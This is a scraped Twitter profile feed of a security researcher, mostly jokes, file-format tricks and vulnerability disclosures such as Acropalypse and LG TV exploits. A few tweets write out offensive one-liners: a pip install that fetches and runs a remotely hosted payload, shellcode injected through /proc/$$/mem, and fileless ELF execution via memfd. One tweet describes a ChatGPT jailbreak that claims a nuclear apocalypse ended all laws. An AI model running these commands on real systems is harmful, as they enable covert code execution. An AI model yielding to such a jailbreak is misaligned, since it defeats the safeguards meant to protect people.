David Buchanan @David3141593 Twitter profile

Pinned Tweet

David Buchanan

@David3141593

3 years

Time for my first proper blog post in 3 years: V8 Heap pwn and /dev/memes - WebOS Root LPE

7

81

381

Last Seen Profiles

@pic____11

@syncn0de

@nec_gr_official

@JUSTGESHA55

@BRocquemor94140

@0xBlockBeard

@TonyTchani23

@m0atn

@SubToAim

@ladypussbug

@NortonJoan12744

@OnePunchDoggo

@FoxtySix

@GasperIlse34858

@WONGBIMA7

@Maren_Kroymann

@Maffewgregg

@stw_pdg

@stwmaniax

@USAO_SC

@LebaronLeo9203

@julenor

@djiguyya

@BinorRaja

@SpreenCARP_

@daizpumpum60382

@alvaboy

@initokyolagi

@BrandonTweedell

@ajze_kas

@Laurenmari4503

@Martyre2000

@StayWithSkzs

@overset_3238

@PorterGwyn57526

@Msg_oBs

David Buchanan

@David3141593

2 years

The image in this tweet displays its own MD5 hash. You can download and hash it yourself, and it should still match - 1337e2ef42b9bee8de06a4d223a51337 I think this is the first PNG/MD5 hashquine.

badidea 🪐

@0xabad1dea

11 years

Trick I want to see: a document in a conventional format (such as PDF) which mentions its own MD5 or SHA1 hash in the text and is right

21

49

266

109

2K

8K

David Buchanan

@David3141593

2 years

holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with minor changes (the pixel format is RGBA not RGB) Tested myself on Windows 11

Chris Blume

@ProgramMax

2 years

@ItsSimonTime @David3141593 I've got a fun one for you all to look at. I opened a 198 byte PNG with Microsoft's Snipping Tool, chose "Save As" to overwrite a different PNG file (no editing), and saves a 4,762 byte file with all that extra after the PNG IEND chunk. Sounds similar :D

13

94

1K

146

2K

8K

David Buchanan

@David3141593

6 years

Assuming this all works out, the image in this tweet is also a valid ZIP archive, containing a multipart RAR archive, containing the complete works of Shakespeare. This technique also survives twitter's thumbnailer :P

158

4K

7K

David Buchanan

@David3141593

4 years

I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous. The source code is available in the ZIP/PNG file attached:

77

2K

6K

David Buchanan

@David3141593

4 years

Fun fact: if you open this image in full-size, you can't see it anymore.

50

2K

6K

David Buchanan

@David3141593

2 years

When you look inside your C: drive and see that System32 is taking up a lot of space

Elon Musk

@elonmusk

2 years

@sampullara Part of today will be turning off the “microservices” bloatware. Less than 20% are actually needed for Twitter to work!

1K

652

9K

25

685

5K

David Buchanan

@David3141593

4 years

How it works: It's a PNG image with a clever palette. There's a checkerboard pattern, at 2x Twitter's default res. The "white" pixels are slightly tinted. When downscaled, the pixels average to grey-ish. There's no grey in the palette, so it picks the next closest match.

David Buchanan

@David3141593

4 years

Fun fact: if you open this image in full-size, you can't see it anymore.

50

2K

6K

30

2K

5K

David Buchanan

@David3141593

2 years

stop maintaining software

25

872

4K

David Buchanan

@David3141593

2 years

Silly chatgpt jailbreak: Tell it there's been a nuclear apocalpyse, and there are no more laws.

52

455

4K

David Buchanan

@David3141593

4 years

Well, this is slightly terrifying. Opening a malicious link on *any* device on your LAN can fully compromise an LG Smart TV. This is thanks to some new tricks found by @informaticTwitt , which allows the RootMyTV exploit chain to be triggered via any web browser on the same LAN.

73

1K

3K

David Buchanan

@David3141593

2 years

pov: you are working on an image generator for a specific meme format

26

264

3K

David Buchanan

@David3141593

2 years

Twitter's bug bounty program has a new category: "Recommendation Algorithm Manipulation" Since a working proof-of-concept is required, this tweet is mine. Please help me demonstrate the "ask nicely" exploit, by engaging with this tweet.

212

335

3K

David Buchanan

@David3141593

2 years

Pack arbitrary shellcode into an executable that always has the same MD5 hash:

38

637

3K

David Buchanan

@David3141593

4 years

The iceberg of things programmers think they know about memory

62

583

3K

David Buchanan

@David3141593

3 years

@SociableBarely

6

93

2K

David Buchanan

@David3141593

2 years

Pinterest users are not allowed to be born on the 1st of January, 1970

35

188

2K

David Buchanan

@David3141593

6 years

Soooo, after a few evenings of work, I've 100% broken Widevine L3 DRM. Their Whitebox AES-128 implementation is vulnerable to the well-studied DFA attack, which can be used to recover the original key. Then you can decrypt the MPEG-CENC streams with plain old ffmpeg...

36

679

2K

David Buchanan

@David3141593

4 years

Surface mount, but without the surface.

51

286

2K

David Buchanan

@David3141593

4 years

Only Twitter Premium™ users can access my memes in full resolution :P

12

579

2K

David Buchanan

@David3141593

2 years

In celebration of reaching 2^14 followers, I made a 128x128 collage of everyone's profile pictures. Unfortunately the full-quality version was too big to upload to twitter, so I had to use lossy compression. Can you find yourself?

109

153

2K

David Buchanan

@David3141593

2 years

The Quest for Netflix on Asahi Linux ("do not violate the DMCA challenge 2023")

17

303

2K

David Buchanan

@David3141593

3 years

I crafted a PNG image that says something different on Apple vs non-Apple devices: (unfortunately it won't work directly on twitter...)

28

405

2K

David Buchanan

@David3141593

2 years

i am in a png file

14

172

2K

David Buchanan

@David3141593

2 years

oh my god it's actually real

14

128

1K

David Buchanan

@David3141593

2 years

TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install " https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"

12

288

1K

David Buchanan

@David3141593

2 years

Imagine if whenever you saw a screenshot of a cool OS, you could run a command to instantly try it out for yourself The command might look something like this, if it were possible: qemu-system-x86_64 -cdrom ' https://pbs'.'twimg'.'com/media/FslP9twWwAYMGGs?format=png&name=large'

David Buchanan

@David3141593

2 years

KolibriOS is very cool. The entire kernel is written in assembly!

11

38

419

27

250

1K

David Buchanan

@David3141593

2 years

I've always wanted to put a USB-C port in an iPhone, but didn't want to risk breaking a good phone. So here's the cheapest iPhone SE I could find on ebay - and cheapest type-C to lightning adapter

17

187

1K

David Buchanan

@David3141593

6 years

To improve security, rotate your passwords frequently

20

286

1K

David Buchanan

@David3141593

2 years

⚠️ TRADE OFFER ⚠️ You receive: Highest-available-resolution images in your twitter feed Elon receives: Increased CDN load

GitHub - DavidBuchanan314/TwitterHD: A userscript that forces twitter to always load images and...

A userscript that forces twitter to always load images and videos in full resolution - DavidBuchanan314/TwitterHD

github.com

15

258

1K

David Buchanan

@David3141593

2 years

This bug is a bad one. You can patch it, but you can't easily un-share all the vulnerable images you may have sent. The bug existed for about 5 years before being patched, which is mind-blowing given how easy it is to spot when you look closely at an output file.

Simon Aarons

@ItsSimonTime

2 years

Introducing acropalypse: a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot. Huge thanks to @David3141593 for his help throughout!

150

3K

9K

16

231

1K

David Buchanan

@David3141593

3 years

Transfer your PC clipboard to a nearby mobile device: xclip -o -s c | qrencode -o - | feh --force-aliasing -ZF -

17

214

1K

David Buchanan

@David3141593

2 years

How to encode a JPEG of an owl

6

158

1K

David Buchanan

@David3141593

3 years

This is one of my entries to the BGGP 2021 Polyglot File challenge. It uses a novel technique of directly embedding data within the compressed image data stream of a PNG. This means you can literally see the bytes of the embedded files!

Battle Programmer Yuu

@netspooky

3 years

The BGGP 2021 Polyglot File Challenge repo is here! Each entry has been scored and visually dissected. Included are the files and info on how to run them yourself!

5

104

321

14

303

1K

David Buchanan

@David3141593

2 years

14

114

1K

David Buchanan

@David3141593

2 years

"Would you like to join our mailing list?" Yes, here are my available pricing plans:

3

183

1K

David Buchanan

@David3141593

6 years

4

269

934

David Buchanan

@David3141593

3 years

RCE over DVB-T This is a 2019 model LG TV

19

263

927

David Buchanan

@David3141593

3 years

I implemented AES-128 in Scratch, because why not

10

164

915

David Buchanan

@David3141593

2 years

"solid state"

5

61

860

David Buchanan

@David3141593

2 years

6

94

856

David Buchanan

@David3141593

4 years

Stop doing UNIX. (Is this meme format overdone enough yet?)

12

240

764

David Buchanan

@David3141593

2 years

Something that surprised me while doing this, was that twitter has none of the most obvious anti-bot mitigations. I aggressively scraped the graphql API, right at the rate limit, impersonating the web client but with a default Python useragent - and the API didn't seem to mind?

David Buchanan

@David3141593

2 years

In celebration of reaching 2^14 followers, I made a 128x128 collage of everyone's profile pictures. Unfortunately the full-quality version was too big to upload to twitter, so I had to use lossy compression. Can you find yourself?

109

153

2K

13

54

721

David Buchanan

@David3141593

2 years

4

105

726

David Buchanan

@David3141593

3 years

I just got DSMCC Carousels working. That means the exploit still fires even if the TV is not connected to the internet. The entire exploit is served over the airwaves. Everyone who said "just don't connect it to the internet" can shut up now :P

David Buchanan

@David3141593

3 years

RCE over DVB-T This is a 2019 model LG TV

19

263

927

17

243

719

David Buchanan

@David3141593

2 years

When you visually compare two hashes, how many digits do you check? The strings hashed below are "retr0id_18b1f814a8e2d9c4fb9c" and "retr0id_1253dea672ebfa240e94", if you want to check for yourself.

60

122

699

David Buchanan

@David3141593

2 years

@gf_256 oh no

5

29

633

David Buchanan

@David3141593

5 years

A while back I prototyped a "Twitch plays binary exploitation" setup. Would anyone be interested in seeing this become a real thing? The general idea is that whatever people type in chat would get sent to stdin (one user at a time, with some kind of queue).

20

108

596

David Buchanan

@David3141593

5 years

I implemented AES128 in 69 bytes of x86 assembly. (from @OverTheWireCTF challenge 0). Can anyone beat that? :P

10

128

610

David Buchanan

@David3141593

2 years

(and yes this is entirely 0day. oops!)

2

11

561

David Buchanan

@David3141593

2 years

New blog post alert: "Exploiting aCropalypse: Recovering Truncated PNGs"

Simon Aarons

@ItsSimonTime

2 years

Introducing acropalypse: a serious privacy vulnerability in the Google Pixel's inbuilt screenshot editing tool, Markup, enabling partial recovery of the original, unedited image data of a cropped and/or redacted screenshot. Huge thanks to @David3141593 for his help throughout!

150

3K

9K

13

240

573

David Buchanan

@David3141593

2 years

What's the closest we've ever been to a sha256 collision? It depends on how you count, but if we're going by number of correct trailing bits, I believe the answer is an astonishing 112 bits (out of 256 total)

2

40

558

David Buchanan

@David3141593

2 years

- Take a screenshot. - Press the save icon. - Crop the screenshot. - Press the save icon and save to the same file (the default!)

12

31

535

David Buchanan

@David3141593

2 years

@trbrtc @malachybrowne @heytherehaley @riley_mellen @AricToler The moral of the story is, don't take the uniformity of random patterns for granite

12

20

541

David Buchanan

@David3141593

3 years

Update: I created a tool to merge arbitary full-colour images. Safari vs Chrome:

David Buchanan

@David3141593

3 years

I crafted a PNG image that says something different on Apple vs non-Apple devices: (unfortunately it won't work directly on twitter...)

28

405

2K

5

143

540

David Buchanan

@David3141593

1 year

Can a program with no dynamic memory allocations get OOM-killed after startup? Yes.

24

46

527

David Buchanan

@David3141593

3 years

strings firmware.bin be like

11

31

513

David Buchanan

@David3141593

3 years

I currently control ~99% of @DuinoCoin mining hashrate, with a single-threaded python script. How? They decided to use a non-cryptographic (invertible) hash function for their mining algorithm... I wonder how long their $13k USD market cap will last?

7

89

513

David Buchanan

@David3141593

2 years

I came up with a new(?) compression-based steganography technique, which should work with most compressed file formats or protocols (e.g. PNG, or even HTTP). It hides data as "mistakes" made by the compression algorithm. Each sub-optimal compression decison encodes ~1 bit.

9

111

510

David Buchanan

@David3141593

2 years

🧵 How to mitigate Acropalypse, server-side: If you run a CDN or similar, you there's a fairly cheap technique you could use to transparently mitigate Acropalypse without having to re-process any of your stored data. (and save some bandwidth too!)

6

97

485

David Buchanan

@David3141593

2 years

if I was programming secure software I would simply never use strings

11

31

476

David Buchanan

@David3141593

1 year

oops

11

38

473

David Buchanan

@David3141593

2 years

Has anyone made this meme yet

1

63

460

David Buchanan

@David3141593

4 years

Download this one, rename to .mp3, and open in VLC for a surprise. (Note: make sure you download the full resolution version of the file, should be 2048x2048px)

19

111

442

David Buchanan

@David3141593

4 years

This technique was inspired by seeing twitter's downscaler rendering piss where it shouldn't. I built a mental model of how that was likely to occur, and then weaponized it.

xin

@yayxinos

4 years

@emihead jeez it looks like he pissed on more than just the floor

1

10

443

4

31

421

David Buchanan

@David3141593

2 years

A few people suggested that maybe Acropalypse was a deliberately planted vulnerability. Personally I still don't think that's the case, but I can't call those people crazy any more 😅

4

18

421

David Buchanan

@David3141593

2 years

Me, when a website asks for permission to use my location

3

48

421

David Buchanan

@David3141593

6 years

Source code. This one is also a PDF :P

10

82

417

David Buchanan

@David3141593

2 years

KolibriOS is very cool. The entire kernel is written in assembly!

11

38

419

David Buchanan

@David3141593

3 years

I should probably just get better at gdb...

4

31

413

David Buchanan

@David3141593

2 years

What if 6502 assembly was more pythonic?

18

32

399

David Buchanan

@David3141593

6 years

curl '' > && unzip && unrar x shakespeare.part001.rar

10

89

384

David Buchanan

@David3141593

2 years

An (extremely) incomplete list of things that use Lempel-Ziv compression, directly or indirectly: DEFLATE zlib ZIP PNG gzip HTTP Nintendo Switch Linux Kernel ZFS NASA's Ingenuity helicopter that landed on Mars zstd JPEG-XL MySQL Tor

7

107

388

David Buchanan

@David3141593

2 years

This was particularly tricky to make work because the image data in a PNG needs to have a valid adler32 checksum, *and* a valid crc32 checksum. Each hex digit "pixel" needed its own colliding block, generated with UniColl. There are 448 of them, taking over 24h to compute.

1

15

381

David Buchanan

@David3141593

6 years

I tried reporting this techinque to twitter's bug bounty program, but it's #notabug . Fair enough, but that just means we can have some fun with it 🤣

9

33

367

David Buchanan

@David3141593

4 years

test

10

35

371

David Buchanan

@David3141593

3 years

A fun trick for running shellcode directly from bash: dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc Caveat: requires root, or YAMA disabled. The shellcode above should shut down your machine :P

4

103

373

David Buchanan

@David3141593

2 years

This is what the UK emergency alert system test notification looked like in Wales, even if your device language was set to English, lol It's followed by an English translation, but it doesn't fit on the screen if you have a larger font. If I didn't know better, I'd be alarmed 😅

16

21

368

David Buchanan

@David3141593

4 years

David Buchanan

@David3141593

4 years

How it works: It's a PNG image with a clever palette. There's a checkerboard pattern, at 2x Twitter's default res. The "white" pixels are slightly tinted. When downscaled, the pixels average to grey-ish. There's no grey in the palette, so it picks the next closest match.

30

2K

5K

1

29

361

David Buchanan

@David3141593

5 years

Ever wanted to inject a shared library into an already-running linux process, without using ptrace? Well, now you can...

dlinject.py demo

https://github.com/DavidBuchanan314/dlinject

asciinema.org

9

156

358

David Buchanan

@David3141593

2 years

But does not apply to the original snipping tool, on win10

Michael

@SciresM

2 years

@David3141593 Note that this *doesn't* apply to the windows 10 snipping tool.

1

4

54

7

37

349

David Buchanan

@David3141593

3 years

Save this image as calc.jar, then double-click to pop calc on Windows, Linux, or macOS (Java installation required, obviously)

15

63

349

David Buchanan

@David3141593

2 years

This is now patched, and has been assigned CVE-2023-28303

David Buchanan

@David3141593

2 years

holy FUCK. Windows Snipping Tool is vulnerable to Acropalypse too. An entirely unrelated codebase. The same exploit script works with minor changes (the pixel format is RGBA not RGB) Tested myself on Windows 11

146

2K

8K

2

58

354

David Buchanan

@David3141593

4 years

The source is also available on Github, for anyone who can't extract the above image:

GitHub - DavidBuchanan314/tweetable-polyglot-png: Pack up to 3MB of data into a tweetable PNG...

Pack up to 3MB of data into a tweetable PNG polyglot file. - DavidBuchanan314/tweetable-polyglot-png

github.com

2

57

348

David Buchanan

@David3141593

2 years

I really wish I'd learnt to use Jupyter notebooks sooner, it's so OP for learning about anything with a visual aspect. I've understood intuitively how JPEG DCT has worked for ages, but I'd never been able to connect that intuition with a concrete implementation until now.

7

36

347

David Buchanan

@David3141593

2 years

i am losing my mind

2

4

328

David Buchanan

@David3141593

2 years

pov: you are publicly disclosing a security vulnerability, at the end of a by-the-books coordinated disclosure process.

13

334

David Buchanan

@David3141593

2 years

It seems like hotwiring a car is one of the easier things to ask for, it still refuses to e.g. tell me how to cook meth (possibly because that's a less plausible thing to want to do after an apocalypse, lol)

15

2

320

David Buchanan

@David3141593

2 years

Twitter supports 4k 60fps video uploads! Here's how to do it 🧵

6

66

329

David Buchanan

@David3141593

2 years

python memfd_create() oneliner: python3 -c "import os;os.fork()or(os.setsid(),print(f\"/proc/{os.getpid()}/fd/{os.memfd_create(str())}\"),os.kill(os.getpid(),19))" This prints the path of a memfd, which you can use to do whatever you want (like fileless ELF execution!)

7

70

328

David Buchanan

@David3141593

4 years

Open in full resolution for a surprise! (Mobile users, tap the 3 dots in the top-right, select view in 4k)

8

87

293

David Buchanan

@David3141593

6 years

Launching the fusée payload on a #NintendoSwitch from a rooted Android device, video courtesy of bedbug1226. (It doesn't work on my device, I have a funky kernel...) Hopefully I'll get a release out soon™. Thanks to @ktemkin and @fail0verflow for the exploits this was based on.

10

103

311

David Buchanan

@David3141593

4 years

The effect happens because Twitter re-quantizes the image after downscaling, reusing the original palette. Normal image viewers (e.g. your web browser) leave it in "full" 8-bit-per-channel sRGB.

3

12

312

David Buchanan

@David3141593

2 years

none of us have the slightest clue what we're doing

gryphoneer

@OneRadChee

2 years

YOU THERE. YES, YOU. WHAT'S A LITTLE-KNOWN FACT ABOUT YOUR PROFESSION THAT WOULD MAKE OTHER PEOPLE LOSE THEIR SHIT?

2K

1K

14K

7

21

319

David Buchanan

@David3141593

2 years

twitter has broken my ZIP/PNG polyglot files :(

David Buchanan

@David3141593

4 years

I found a way to stuff up to ~3MB of data inside a PNG file on twitter. This is even better than my previous JPEG ICC technique, since the inserted data is contiguous. The source code is available in the ZIP/PNG file attached:

77

2K

6K

3

20

317

David Buchanan

@David3141593

6 years

GateFi is the world's first completely un-hackable gateway security solution. It uses cutting-edge #LockChain technology in order to secure your assets. We're so confident in our security, we're offering a $250k bounty to anyone who can break it!

8

67

302

David Buchanan

@David3141593

2 years

Finding out that Python 3.11 adds default endianness arguments for int .to_bytes() and int.from_bytes()

6

22

319

David Buchanan

@David3141593

2 years

This also applies to the "Snip & Sketch" tool in Windows 10.

3

19

310

David Buchanan

@David3141593

2 years

ublock rule to hide all verified icons: # #svg [data-testid="icon-verified"] ublock rule to hide all doges: # #path [d="M2.412.974h19.176v22.052H2.412z"]

4

57

308

David Buchanan

@David3141593

2 years

Here's a behind-the-scenes look at what the collision data looks like. You can't see the garbage pixels in the final image because I used a clever palette. Right column is the main set of UniColl collisions, and the lower edge is the adler32 FastColl blocks.

2

38

310